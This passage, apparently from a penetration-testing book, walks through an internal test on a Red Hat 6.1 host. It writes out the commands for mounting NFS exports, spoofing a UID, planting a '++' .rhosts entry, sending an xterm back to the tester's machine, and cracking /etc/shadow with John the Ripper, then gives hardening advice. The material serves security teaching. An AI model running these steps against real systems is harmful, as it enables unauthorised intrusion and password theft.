| I l@ve RuBoard | |
During an internal penetration test we found some interesting services running on a UNIX system at IP address 10.10.10.10. Our Nmap port scan (using the command shown below) revealed that NFS (port 2049) and rlogin (port 513) were running on the target system. Nmap's operating system detection also revealed that the operating system was Red Hat 6.1. We determined that we might be able to exploit NFS and rlogin to gain access to the system.
# nmap sT O 10.10.10.1-254
First we needed to determine what information was available from NFS. We issued the command:
# showmount e 10.10.10.10
This command returned the information that users' home directories were exported. Using the mount command we mounted a user's home directory, which we will call user1.
Since rlogin was also running on the server, we could attempt to establish a trust relationship so that we could log in to the system with no password. A .rhosts file in a user's home directory specifies what systems are trusted and allows users from those hosts to log in with no password. Therefore, if we could create a .rhosts file in the user1 home directory and add an entry to allow it to trust our system, we could log in with no password.
Unfortunately, the mounted file system was not writable. We attempted to use nfsshell to get around this problem. Using nfsshell, we attempted to change the UID to 1 on the mounted file system to give us write access. This is done by simply specifying the UID value in the nfsshell client:
nfs> uid 1
Using the status command we verified that the UID was changed.
Now that we had write access to the file system, we could create a .rhosts file. Adding a "++" to the .rhosts file causes the target to trust any user on every system. We issued the following command to create the .rhosts file in the user1 home directory.
# echo ++ >.rhosts
Now we could log in to the system as user1:
# rlogin l user1 10.10.10.10
Now we were logged in as user1. We wanted to elevate our privileges to root. To help us achieve this, we sent an Xterm back to our system. On our system we issued the following command:
# xhost +10.10.10.10
On the target system, we executed the following command to export the display. The IP address of our laptop was 10.10.10.100.
# xterm -display 10.10.10.100:0.0
Now we had a fully functional Xterm and could execute commands as if we were sitting at the console. Next, we started to research local buffer overflow attacks that we could use to elevate our access. Searching Packetstorm we found a local buffer overflow for Red Hat 6.1 that yielded root access. We downloaded an exploit called vixi-crontab. We ran this exploit and obtained root privileges on the system.
Once we had root we captured the password and shadow password files and cracked them using John the Ripper.
# unshadow /etc/passwd /etc/shadow > crack.1 # john crack.1
Now we had additional passwords to attempt on other systems.
Be careful what you export through NFS. Since the home directories were exported in this instance we used them to attack the system. Also, the use of rlogin should be avoided. Instead, users and administrators should use secure applications, such as SSH, that encrypt the remote sessions. Finally, the system should have been patched against the exploit that we used.
| I l@ve RuBoard | |